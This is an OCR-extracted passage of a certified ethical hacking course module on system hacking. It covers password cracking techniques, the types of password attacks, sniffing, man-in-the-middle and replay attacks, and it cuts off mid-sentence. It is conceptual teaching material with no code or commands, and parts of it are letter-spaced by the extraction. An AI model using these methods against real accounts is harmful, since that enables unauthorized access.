SlideShare ist ein Scribd-Unternehmen logo

Ce hv8 module 05 system hacking

Mehrdad Jingoism
Mehrdad Jingoism

The document discusses password cracking and its role in system hacking. It begins by explaining that password cracking is used to recover passwords through transmitting or stored computer data. Attackers often use password cracking to gain unauthorized access, as most hacking attempts start with password cracking. Password cracking can be manual or through automated tools using dictionary attacks or brute-force methods. Weak or common passwords make systems vulnerable to cracking.

TechnologieNews & Politik
1 von 310
Downloaden Sie, um offline zu lesen
System Hacking Module 05
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker System H acking Module 05 Engineered by Hackers. Presented by Professionals. i. / CEH P n! Ethical Hacking and Countermeasures v8 Module: 05 System Hacking Exam 312-50 Module 05 Page 518 Ethical Hacking and Countermeasures Copyright © by EC-C0linCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Security News CEH (•itifwtf m - itkMl lUclwt September 26th, 2012 IE E E H a ck C o n firm ed , 100k Plain T e x t P assw o rd s V ulnerable After details were revealed by Radu Dragusin over at IEEEIog.com a few days ago that passwords and user details for some 100,000 members of the Institute of Electrical and Electronics Engineers had been made publicly available on the company's FTP server for at least a month, the organisation has now confirmed it in a communication to members, advising them to change their details immediately. The IEEE is an organisation that is designed to advance technology and has over 400,000 members worldwide, many of those including employees at Apple, Google, IBM, Oracle and Samsung. It is responsible for globally used standards like the IEEE 802.3 Ethernet standard and the IEEE 802.11 Wireless Networking standard. At an organisation like this, you'd expect security to be high. Still, this hack was no hoax. The official announcement of it was sent out yesterday and reads: "IEEE has become aware of an incident regarding inadvertent access to unencrypted log files containing user IDs and passwords. This matter has been addressed and resolved. None of your financial information was made accessible in this situation." http://www.kitguru.net Copyright © by EC-Caind. All Rights Reserved. Reproduction is Strictly Prohibited. Security N ew s IE E E Hack Confirm ed, 100k Plain Text Passwords Vulnerable Source: http://www.kitguru.net After details were revealed by Radu Dragusin over at IEEEIog.com recently that passwords and user details for some 100,000 members of the Institute of Electrical and Electronics Engineers had been made publicly available on the company's FTP server for at least a month, the organization confirmed this in a communication to members, advising them to change their details immediately. The IEEE is an organization that is designed to advance technology and has over 400,000 members worldwide, many of those including employees at Apple, Google, IBM, Oracle, and Samsung. It is responsible for globally used standards like the IEEE 802.3 Ethernet standard and the IEEE 802.11 Wireless Networking standard. At an organization like this, you'd expect security to be high. Still, this hack was no hoax. The official announcement of it reads: "IEEE has become aware of an incident regarding inadvertent access to unencrypted log files containing user IDs and Module 05 Page 519 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker passwords. This matter has been addressed and resolved. None of your financial information was made accessible in this situation." The company continued saying though, that it was technically possible that during the time this information was available, that someone could have used it to access a user's account and therefore, as a "precautionary measure," the IEEE recommended all users change their account information. Until that time, users were not be able to access their account at all. In what seems like quite a bold move, the organization went on to explain to users that one of the best ways to protect themselves is to use a strong, unique password for their login. Considering it was an IEEE security blunder that caused the hack, advising other people on password strength seems a bit hypocritical. That said, in Mr Dragusin's reveal of the hacked information, he produced a graph detailing some of the most commonly used passwords. Almost 300 people used "123456" and other variations of numbers in that same configuration, while hundreds of others used passwords like "admin," "student," and "ieee2012." Considering the involvement of IEEE members in pushing the boundaries of current technology, you'd assume we wouldn't need to turn to Eugene "The Plague" Belford to explain the importance of password security. Copyright © 2010-2013 KitGuru Lim ited Author: Jon Martindale http://www.kitguru.net/channel/ion-rnartindale/ieee-hack-confirmed-100k-plain-textpasswords-vulnerable/ Module 05 Page 520 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker M odule O bjectives ‫י‬ CEH UrtilM itkKJl Nm Im ‫י‬ r J System Hacking: Goals J Types of Keystroke Loggers and Spywares J CEH Hacking Methodology (CHM) J Anti-Keylogger and Anti-Spywares J Password Cracking J Detecting Rootkits J Stealing Passwords Using Keyloggers J Anti-Rootkits J Microsoft Authentication J NTFS Stream Manipulation J How to Disable LM HASH J Classification of Steganography J How to Defend against Password Cracking J Steganalysis Methods/Attacks on Steganography J Privilege Escalation J Covering Tracks J Executing Applications J Penetration Testing ^ Copyright © by EC-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. M odule O bjectives The preceding modules dealt with the progressive intrusion that an attacker makes towards his or her target system(s). You should bear in mind that this does not indicate a culmination of the attack. This module familiarizes you with: System Hacking: Goals Types of Keystroke Loggers and Spywares CEH Hacking Methodology (CHM) Anti-Keylogger and Anti-Spywares Password Cracking Detecting Rootkits Stealing Passwords Using Keyloggers Anti-Rootkits Microsoft Authentication NTFS Stream Manipulation Howto Disable LM HASH Classification of Steganography How to Defend against Password Cracking Steganalysis Methods/Attacks on Steganography Privilege Escalation Covering Tracks Executing Applications Penetration Testing Module 05 Page 521 Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Inform ation at Hand Before System H acking Stage C EH (•rtifwtf itkitjl What you have at this stage: Copyright © by EG-Cowid. All Rights Reserved Reproduction is Strictly Prohibited. Inform ation at Hand Before System H acking Stage Before beginning with system hacking, let's go over the phases you went through and the information you collected so far. Prior to this module, we discussed: Footprinting M odule Footprinting is the process of accumulating data regarding a specific network environment. Usually this technique is applied for the purpose of finding ways to intrude into the network environment. Since footprinting can be used to attack a system, it can also be used to protect it. In the footprinting phase, the attacker creates a profile of the target organization, with the information such as its IP address range, namespace, and employee web usage. Footprinting improves the ease with which the systems can be exploited by revealing system vulnerabilities. Determining the objective and location of an intrusion is the primary step involved in footprinting. Once the objective and location of an intrusion is known, by using nonintrusive methods, specific information about the organization can be gathered. For example, the web page of the organization itself may provide employee bios or a personnel directory, which the hacker can use it for the social engineering to reach the objective. Conducting a Whois query on the web provides the associated networks and domain names related to a specific organization. Module 05 Page 522 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Scanning M odule Scanning is a procedure for identifying active hosts on a network, either for the purpose of network security assessment or for attacking them. In the scanning phase, the attacker finds information about the target assessment through its IP addresses that can be accessed over the Internet. Scanning is mainly concerned with the identification of systems on a network and the identification of services running on each computer. Some of the scanning procedures such as port scans and ping sweeps return information about the services offered by the live hosts that are active on the Internet and their IP addresses. The inverse mapping scanning procedure returns the information about the IP addresses that do not map to the live hosts; this allows an attacker to make suppositions about feasible addresses. Enum eration M odule Enumeration is the method of intrusive probing into the target assessment through which attackers gather information such as network user lists, routing tables, and Simple Network Management Protocol (SNMP) data. This is significant because the attacker crosses over the target territory to unearth information about the network, and shares users, groups, applications, and banners. The attacker's objective is to identify valid user accounts or groups where he or she can remain inconspicuous once the system has been compromised. Enumeration involves making active connections to the target system or subjecting it to direct queries. Normally, an alert and secure system will log such attempts. Often the information gathered is what the target might have made public, such as a DNS address; however, it is possible that the attacker stumbles upon a remote IPC share, such as IPC$ in Windows, that can be probed with a null session allowing shares and accounts to be enumerated Module 05 Page 523 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker System Hacking: Goals C EH («>«1fw4 itkMjl IlMhM r ‫־‬ N Hacking-Stage Goal Technique/Exploit Used Gaining Access To collect enough information to gain access Password eavesdropping, brute forcing Escalating Privileges T create a privileged user account o if the user level is obtained Password cracking, known exploits |» | A np 15■ h ■ ‫1 יי ׳ #יו*»י‬ To create and maintain backdoor access Hiding Files ‫■יין‬ Trojans To hide malicious files Rootkits To hide the presence of compromise Clearing logs Copyright © by E&Cauactl. All Rights Reserved. Reproduction isStrictly Prohibited. System Hacking: Goals Every criminal commits a crime to achieve certain goal. Likewise, an attacker can also have certain goals behind performing attacks on a system. The following may be some of the goals of attackers in committing attacks on a system. The table shows the goal of an attacker at different hacking stages and the technique used to achieve that goal. Module 05 Page 524 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker r Hacking-Stage Technique/Exploit Used Gaining Access To collect enough information to gain access Password eavesdropping, brute forcing Escalating Privileges To create a privileged user account if the user level is obtained Password cracking, known exploits Executing Applications To create and maintain backdoor access Trojans Hiding Files To hide malicious files Rootkits Covering Tracks s Goal To hide the presence of compromise Clearing logs A ao FIGURE 5.1: Goals for System Hacking Module 05 Page 525 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker CEH Hacking Me Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. CEH H acking M ethodology (CHM) N —(£__4) ^ ‫ ^׳־־־‬Before hacking a system, an attacker uses footprinting, scanning, and enumeration techniques to detect the target area of the attack and the vulnerabilities that prove to be doorways for the attacker. Once the attacker gains all the necessary information, he or she starts hacking. Similar to the attacker, an ethical hacker also follows the same steps to test a system or network. In order to ensure the effectiveness of the test, the ethical hacker follows the hacking methodology. The following diagram depicts the hacking methodology followed by ethical hackers: Module 05 Page 526 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker FIGURE 5.2: CEH Hacking Methodology (CHM) Module 05 Page 527 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker CEH System H acking Steps *‫־‬ System hacking cannot be accomplished at a single go. It is accomplished through various steps that include cracking passwords, escalating privileges, executing applications, hiding files, covering tracks, and finally penetration testing. Now it's time to discuss these steps one by one thoroughly, to determine how the attacker hacks the system. In an attempt to hack a system, the attacker first tries to crack passwords. This section describes the first step, i.e., password cracking, that will tell you how and what types of different tools and techniques an attacker uses to crack the password of the target system. 121 IE.- Cracking Passwords Hiding Files ^ Escalating Privileges Covering Tracks Executing Applications Penetration Testing Module 05 Page 528 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Passw ord C racking CEH (•It'fwd ttkujl M ck * a • Password cracking techniques are used to recover passwords from computer systems Attackers use password cracking techniques to gain unauthorized access to the vulnerable system Victim Attacker Most of the password cracking techniques are successful due to weak or easily guessable passwords Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. Password Cracking —“ Password cracking is the process of recovering passwords from the data that has been transmitted by a computer system or stored in it. The purpose of password cracking might be to help a user recover a forgotten or lost password, as a preventive measure by the system administrators to check for easily crackable passwords or it can also be used to gain unauthorized access to a system. Many hacking attempts start with password cracking attempts. Passwords are the key piece of information necessary to access a system. Consequently, most attackers use password cracking techniques to gain unauthorized access to the vulnerable system. Passwords may be cracked manually or with automated tools such as a dictionary or brute-force method. The computer programs that are designed for cracking passwords are the functions of the number of possible passwords per second that can be checked. Often users, while creating passwords, select passwords that are predisposed to being cracked such as using a pet's name or choosing one that's simple so they can remember it. Most of the passwords cracking techniques are successful due to weak or easily guessable passwords. Module 05 Page 529 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Passw ord C om plexity CEH © Passwords that contain only letters P O TH M YD E ......... V © Passwords that contain only letters and special ..............v characters bob@&ba ^ Passwords that contain only special characters .......... I and numbers 123@$45 * 0 A+D+u = Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. Password C om plexity Password complexity plays a key role in improving security against attacks. It is the important element that users should ensure while creating a password. The password should not be simple since simple passwords are prone to attacks. The passwords that you choose should always be complex, long, and difficult to remember. The password that you are setting for your account must meet the complexity requirements policy setting. Password characters should be a combination of alphanumeric characters. Alphanumeric characters consist of letters, numbers, punctuation marks, and mathematical and other conventional symbols. See the implementation that follows for the exact characters referred to: 0 Passwords that contain letters, special characters, and numbers: apl@52 0 Passwords that contain only numbers: 23698217 0 Passwords that contain only special characters: & *# @ !(%) 0 Passwords that contain letters and numbers: meetl23 0 Passwords that contain only letters: POTHMYDE 0 Passwords that contain only letters and special characters: bob@&ba 0 Passwords that contain only special characters and numbers: 123@$4 Module 05 Page 530 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Password Cracking T echniques CEH UrtifW A dictionary file The program tries is loaded into the cracking every combination of application that characters until runs against user accounts the password is broken ■ Dictionary Attack It works like a dictionary attack, but adds some numbers and symbols to the words from the dictionary and tries to crack the password itkH il lUckw It is the This attack is used combination of both brute force when the attacker gets some attack and the information about dictionary attack the password ■ ■ B ru te Forcing H y b rid Syllable R u le -ba sed A ttacks A tta ck A tta ck A tta ck 0 * j Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. Password Cracking T echniques Password cracking is the technique used for discovering passwords. It is the classic way to gain privileges to a computer system or network. The common approach for cracking a password is to continually try guesses for the password with various combinations until you get the correct one. There are five techniques for password cracking, as follows. D ictionary Attacks In a dictionary attack, a dictionary file is loaded into the cracking application that runs against user accounts. This dictionary is the text file that contains a number of dictionary words. The program uses every word present in the dictionary to find the password. Dictionary attacks are more useful than brute force attacks. But this attack does not work with a system that uses passphrases. This attack can be applied under two situations: Q In cryptanalysis, it is used to find out the decryption key for obtaining plaintext from ciphertext. © In computer security, to avoid authentication and access the computer by guessing passwords. Module 05 Page 531 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Methods to improve the success of a dictionary attack: 0 Use the number of dictionaries such as Technical dictionaries and foreign dictionaries which helps to retrieve the correct password © Use the string manipulation on the dictionary, means if dictionary contain the word "system" then try string manipulation and use "metsys" and others Brute Forcing Attacks The cryptographic algorithms must be sufficiently hardened in order to prevent a brute-force attack. The definition as stated by RSA: "Exhaustive key-search, or brute-force search, is the basic technique for trying every possible key in turn until the correct key is identified." When someone tries to produce each and every single encryption key for data until the needed information is detected, this is termed a brute force attack. Until this date, this type of attack was performed by those who had sufficient processing power. The United States government once believed (in 1977) that a 56-bit Data Encryption Standard (DES) was sufficient to deter all brute-force attacks, a claim that several groups across the world had tested. Cryptanalysis is a brute force attack on an encryption of a brute force search of the keyspace. In other words, testing all possible keys is done in an attempt to recover the plaintext used to produce a particular ciphertext. The detection of key or plaintext with a faster pace as compared to the brute force attack can be considered a way of breaking the cipher. A cipher is secure if no method exists to break that cipher other than the brute force attack. Mostly, all ciphers are deficient of mathematical proof of security. If the keys are originally chosen randomly or searched randomly, the plaintext will, on average, become available after half of all the possible keys are tried. Some of the considerations for brute-force attacks are as follows: © It is a time-consuming process © All passwords will eventually be found © Attacks against NT hashes are much more difficult than LM hashes Q P Hybrid Attack ‫ ׳ ־יי‬This type of attack depends upon the dictionary attack. There are chances that people — might change their password by just adding some numbers to their old password. In this type of attack, the program adds some numbers and symbols to the words from the dictionary and tries to crack the password. For example, if the old password is "system," then there is a chance that the person will change it to "systeml" or "system2." Module 05 Page 532 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker S yllable A ttack A s y lla b le a t t a c k is t h e c o m b i n a t i o n o f b o t h a b r u t e f o r c e a t t a c k a n d t h e d ic t io n a r y a tta c k . This c r a c k in g t e c h n i q u e is used w h e n t h e p a s s w o r d is n o t an e x is t in g w o r d . A t t a c k e r s use t h e d i c t i o n a r y a n d o t h e r m e t h o d s t o c ra c k it. It also uses t h e p o s s ib le c o m b i n a t i o n o f e v e r y w o r d p r e s e n t in t h e d ic t io n a r y . R u le-b ase d A ttack T his t y p e o f a t t a c k is used w h e n t h e a t t a c k e r g e ts s o m e i n f o r m a t i o n a b o u t th e p a s s w o r d . T his is t h e m o s t p o w e r f u l a t t a c k b e c a u s e t h e c r a c k e r k n o w s t h e t y p e o f p a s s w o r d . For e x a m p le , if t h e a t t a c k e r k n o w s t h a t t h e p a s s w o r d c o n t a in s a t w o - o r t h r e e - d i g i t n u m b e r , t h e n h e o r she w i ll use s o m e s p e c ific t e c h n i q u e s a n d e x t r a c t t h e p a s s w o r d in less t i m e . By o b t a i n i n g u s e fu l i n f o r m a t i o n such as use o f n u m b e r s , t h e le n g t h o f p a s s w o r d , a n d sp ec ial c h a r a c te r s , t h e a t t a c k e r can e a sily a d ju s t t h e t i m e f o r r e t r i e v i n g t h e p a s s w o r d t o t h e m i n i m u m a n d e n h a n c e t h e c r a c k in g t o o l t o r e t r i e v e p a s s w o r d s . T h is t e c h n i q u e in v o lv e s b r u t e fo r c e , d ic t io n a r y , a n d s y l l a b le a tta c k s . Module 05 Page 533 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Types of Password Attacks Shoulder Surfing » e Social Engineering e Dumpster Diving 1. Passive Online Attacks C EH » Wire Sniffing tJ Man-in-the-Middle e Attacker performs password hacking without communicating with the authorizing party Replay 2. Active Online Attacks 4. Non-Electronic Attacks Attacker need not posses Attacker tries a list of technical knowledge to crack passwords one by one against the victim to crack password password, hence known as non-technical attack 6 Distributed Network « Rainbow 4 A 3. Offline Attack a Hash Injection Attacker copies the target's password file and then tries to crack passwords in his own system at different location « Trojan/Spyware/Keyloggers « Password Guessing w Phishing Pre-Computed Hashes » $ Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. it ‫וך‬ T ypes of P assw o rd A ttacks P a s s w o rd c r a c k in g is o n e o f t h e c ru c ia l sta ge s o f h a c k i n g a s y s t e m . P a s s w o rd c r a c k in g u sed f o r le g a l p u r p o s e s r e c o v e r s t h e f o r g o t t e n p a s s w o r d o f a u se r; if it is u sed b y i l l e g i t i m a t e users, it can ca use t h e m t o g a in u n a u t h o r i z e d p r i v i le g e t o t h e n e t w o r k o r s y s te m . P a s s w o rd a tta c k s a re c la s s ifie d b ase d o n t h e a t t a c k e r 's a c tio n s t o c ra c k a p a s s w o r d . U s u a lly t h e r e a re o f f o u r ty p e s . T h e y are: A 111A P a ssiv e O n lin e A ttacks A passive a t t a c k is an a t t a c k o n a s y s te m t h a t d o e s n o t r e s u lt in a c h a n g e t o t h e s y s te m in a n y w a y . T h e a t t a c k is t o p u r e l y m o n i t o r o r r e c o r d d a ta . A p a s s iv e a t t a c k o n a c r y p t o s y s t e m is o n e in w h i c h t h e c r y p t a n a l y s t c a n n o t i n t e r a c t w i t h a n y o f t h e p a r tie s in v o lv e d , a t t e m p t i n g t o b r e a k t h e s y s te m s o le ly b a se d u p o n o b s e r v e d d a ta . T h e r e a re t h r e e ty p e s o f p assive o n l i n e a tta c k s . T h e y are: Q W i r e s n if fin g Q M a n -in -th e -m id d le Q R ep lay Module 05 Page 534 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker |1gn,‫׳‬nd A ctive O n lin e A ttacks n1 A n a c tiv e o n l i n e a t t a c k is t h e e a s ie s t w a y t o g ain u n a u t h o r i z e d a d m i n i s t r a t o r - l e v e l access t o t h e s y s te m . T h e r e a re t h r e e ty p e s o f A c t iv e O n lin e A tta c k s . T h e y are: 0 P a s s w o rd g ue ssin g 0 T r o j a n / s p y w a r e / k e y lo g g e r 0 Hash in je c t io n 0 Ph ishin g O ffline A ttacks O f f l i n e a t t a c k s o c c u r w h e n t h e i n t r u d e r ch e c k s t h e v a l i d i t y o f t h e p a s s w o r d s . He o r sh e o b s e rv e s h o w t h e p a s s w o r d is s t o r e d in t h e t a r g e t e d s y s t e m . If t h e u s e r n a m e s a n d t h e p a s s w o r d s a re s t o r e d in a file t h a t is r e a d a b le , it b e c o m e s easy f o r t h e i n t r u d e r t o g a in access t o t h e s y s te m . In o r d e r t o p r o t e c t y o u r p a s s w o r d s list t h e y s h o u ld a lw a y s be k e p t in an u n r e a d a b l e f o r m , w h i c h m e a n s t h e y h a v e t o be e n c r y p t e d . O ff li n e a tta c k s a re o f t e n t i m e c o n s u m in g . T h e y a re su c ce ssfu l b e c a u s e t h e L M h a s h e s are v u ln e r a b l e due to a s m a lle r keyspace and sh o rte r le n g t h . D iffe re n t p assw ord c r a c k in g t e c h n i q u e s a re a v a ila b le o n t h e I n t e r n e t . T h e t e c h n i q u e s t o p r e v e n t o r p r o t e c t f r o m o f f l i n e a tta c k s are: 0 Use g o o d p a s s w o rd s 0 R e m o v e LM hashes 0 A t t a c k e r has t h e p a s s w o r d d a ta b a s e 0 Use c r y p t o g r a p h ic a lly s e c u re m e t h o d s w h i l e r e p r e s e n t in g t h e p a s s w o rd s T h e r e are t h r e e t y p e s o f o f f l i n e a tta c k s . T h e y are: 0 P r e - c o m p u t e d hashes 0 D is t r ib u t e d n e t w o r k 0 R a in b o w ------ ------------------------------------------------ k n o w n as n o n - t e c h n ic a l a tta c k s . This k in d o f a t t a c k d o e s n ' t r e q u ir e a n y te c h n ic a l k n o w le d g e a b o u t t h e m e t h o d s o f i n t r u d i n g i n t o a n o t h e r 's s y s te m . T h e r e f o r e , it is c a lle d a n o n - e l e c t r o n i c a tta c k . T h e r e a re t h r e e ty p e s o f n o n - e l e c t r o n i c a tta c k s . T h e y are: 0 S h o u ld e r s u rfin g 0 Social e n g in e e r in g 0 D u m p s t e r d iv in g Module 05 Page 535 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Passive O nline A ttack: W ire Sniffing CEH Q Attackers run packet sniffer tools on the local area network (LAN) to access and record the raw network traffic Com putationally Com plex Victim Attacker Victim The captured data may include sensitive information such as passwords (Telnet, FTP, rlogin sessions, etc.) and emails Sniffed credentials are used to gain unauthorized access to the target system Copyright © by E&Cauactl. All Rights Reserved. Reproduction isStrictly Prohibited. -7—-1 P a ssiv e O n lin e A ttack: W ire Sniffing 7 M m ---------- - 3 A p a c k e t s n i f f e r t o o l is s e ld o m used f o r an a tta c k . T his is b e c a u s e a s n if f e r can w o r k o n l y in a c o m m o n c o llis io n d o m a i n . C o m m o n c o ll i s i o n d o m a i n s a re n o t c o n n e c t e d b y a s w it c h o r b rid g e . All t h e h o s ts o n t h a t n e t w o r k a re a lso n o t s w i t c h e d o r b r id g e d in t h e n e t w o r k s e g m e n t. As s n if fe r s g a t h e r p a c k e ts a t t h e D a ta L in k L a ye r, t h e y can g ra b all p a c k e ts o n t h e LAN o f th e m a c h in e t h a t is r u n n i n g t h e s n i f f e r p r o g r a m . T his m e t h o d is r e l a t iv e l y h a r d t o p e r p e t r a t e a n d is c o m p u t a t io n a lly c o m p lic a te d . T his is b e c a u s e a n e t w o r k w i t h a h u b i m p l e m e n t s a b r o a d c a s t m e d i u m t h a t all s y s te m s s h a re o n t h e LAN. A n y d a ta s e n t acro ss t h e LAN is a c tu a lly s e n t t o e a c h a n d e v e r y m a c h in e c o n n e c t e d t o t h e LAN. If an a t t a c k e r r u n s a s n if f e r o n o n e s y s te m o n t h e LAN, he o r she can g a t h e r d a ta s e n t t o a n d f r o m a n y o t h e r s y s te m o n t h e LAN. T h e m a j o r i t y o f s n i f f e r t o o l s a re id e a lly s u it e d t o s n if f d a ta in a h u b e n v i r o n m e n t . T h e se t o o l s a re c a lle d p assive s n if fe r s as t h e y p a s s iv e ly w a i t f o r d a ta t o be s e n t, b e f o r e c a p t u r i n g t h e i n f o r m a t i o n . T h e y a re e f f i c i e n t a t i m p e r c e p t i b l y g a t h e r i n g d a t a f r o m t h e LAN. T h e c a p t u r e d d a ta m a y in c lu d e p a s s w o r d s s e n t t o r e m o t e s y s te m s d u r in g T e l n e t , FTP, r lo g i n se s s io n s , a nd e le c t r o n i c m a il s e n t a n d r e c e iv e d . S n i f f e d c r e d e n t i a l s a re used t o g ain u n a u t h o r i z e d access t o t h e t a r g e t s y s te m . T h e r e a re a v a r i e t y o f t o o ls a v a ila b le o n t h e I n t e r n e t f o r p a s s iv e w i r e s n if f i n g . Module 05 Page 536 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Victim Module 05 Page 537 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker P a ssiv e O n lin e A ttacks: M an-in-theM id d le a n d R eplay A ttack Victim CEH Web Server Attacker Considerations In a MITM attack, the attacker acquires access to the communication channels between victim and server to extract the information Relatively hard to perpetrate In a replay attack, packets and authentication tokens are captured using a sniffer. After the relevant info is extracted, thetokens are placed back on the network to gain access Must be trusted by one or both sides Can sometimes be broken by invalidating traffic Copyright © by E&Coincil. All Rights Reserved. Reproduction isStrictly Prohibited. ^ P a ssiv e O n lin e A ttack: M a n ‫־‬in ‫־‬th e ‫־‬M id d le an d R ep lay A ttack ‫י‬ W h e n t w o p a r tie s a re c o m m u n i c a t i n g , t h e m a n - i n - m i d d l e a t t a c k can ta k e p la ce. In t h is case, a t h i r d p a r t y i n t e r c e p t s t h e c o m m u n i c a t i o n b e t w e e n t h e t w o p a r tie s , a s s u rin g t h e t w o p a r tie s t h a t t h e y are c o m m u n i c a t i n g w i t h e a ch o t h e r . M e a n w h i l e , t h e t h i r d p a r t y a lt e r s t h e d a ta o r e a v e s d r o p s a n d passes t h e d a ta a lo n g . T o c a r r y o u t th is , t h e m a n in m id d l e has t o s n i f f f r o m b o t h sides o f t h e c o n n e c t i o n s i m u l t a n e o u s ly . T his t y p e o f a t t a c k is o f t e n f o u n d in t e l n e t and w ir e le s s t e c h n o l o g i e s . It is n o t easy t o i m p l e m e n t such a tta c k s d u e t o t h e TCP s e q u e n c e n u m b e r s a n d s p e e d . This m e t h o d is r e l a t iv e l y h a r d t o p e r p e t r a t e a n d can be b r o k e n s o m e t i m e s by in v a lid a tin g th e tra ffic . In a r e p la y a tta c k , p a c k e ts a re c a p t u r e d u sin g a s n if fe r . A f t e r t h e r e l e v a n t i n f o r m a t i o n is e x t r a c t e d , t h e p a c k e ts a re p la c e d b a ck o n t h e n e t w o r k . This t y p e o f a t t a c k can be u sed t o r e p la y b a n k t r a n s a c t i o n s o r o t h e r s i m i l a r ty p e s o f d a ta t r a n s f e r in t h e h o p e o f r e p l i c a t i n g o r c h a n g i n g a c tiv it ie s , such as d e p o s its o r tr a n s fe r s . Module 05 Page 538 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Original Connection M r Victim ................... » .................... O ................ » .■........................... > Sniff MITM / Replay W eb Server Traffic FIGURE 5.4: Passive Online Attack by Using Man-in-the-Middle and Replay Attack Module 05 Page 539 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Active O nline Attack: Passw ord G uessing Network I The attacker takes a set of dictionary words and names, and tries all the possible combinations to crack the password C EH Network Server Network --------- /c n = < !_! Considerations Network - Time consuming 1 1 Requires huge amounts of network bandwidth J Easily detected Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. A ctive O n lin e A ttack: P assw o rd G u e ssin g E v e r y o n e k n o w s y o u r u s e r n a m e , b u t y o u r p a s s w o r d is a w e l l - k e p t s e c re t in o r d e r t o k e e p o t h e r s a w a y f r o m a c c e s s in g y o u r tr a n s a c t io n s . W i t h t h e aid o f d i c t i o n a r y a t t a c k m e t h o d o l o g i e s , an i n t r u d e r tr ie s m a n y m e a n s t o g u e s s y o u r p a s s w o r d . In th is m e t h o d o l o g y , an a t t a c k e r ta k e s a s e t o f d i c t i o n a r y w o r d s a n d n a m e s , a n d m a k e s all t h e p o s s ib le c o m b i n a t i o n s t o g e t y o u r p a s s w o r d . T h e a t t a c k e r p e r f o r m s t h is m e t h o d w i t h p r o g r a m s t h a t guess h u n d r e d s o r th o u s a n d s o f w o r d s p e r s e c o n d . T his m a k e s it e a s y f o r t h e m t o t r y m a n y v a r i a t i o n s : b a c k w a r d s w o r d s , d i f f e r e n t c a p i t a l i z a t i o n , a d d in g a d ig i t t o t h e e n d , e tc. T o f a c i li t a t e t h is f u r t h e r , t h e a t t a c k e r c o m m u n i t y has b u i l t large d i c t i o n a r i e s t h a t in c lu d e w o r d s f r o m f o r e i g n la n g u a g e s, o r n a m e s o f th in g s , places, a n d t o w n s m o d e l e d t o c ra c k p a s s w o r d s . A t t a c k e r s can also scan y o u r p r o f i le s t o lo o k f o r w o r d s t h a 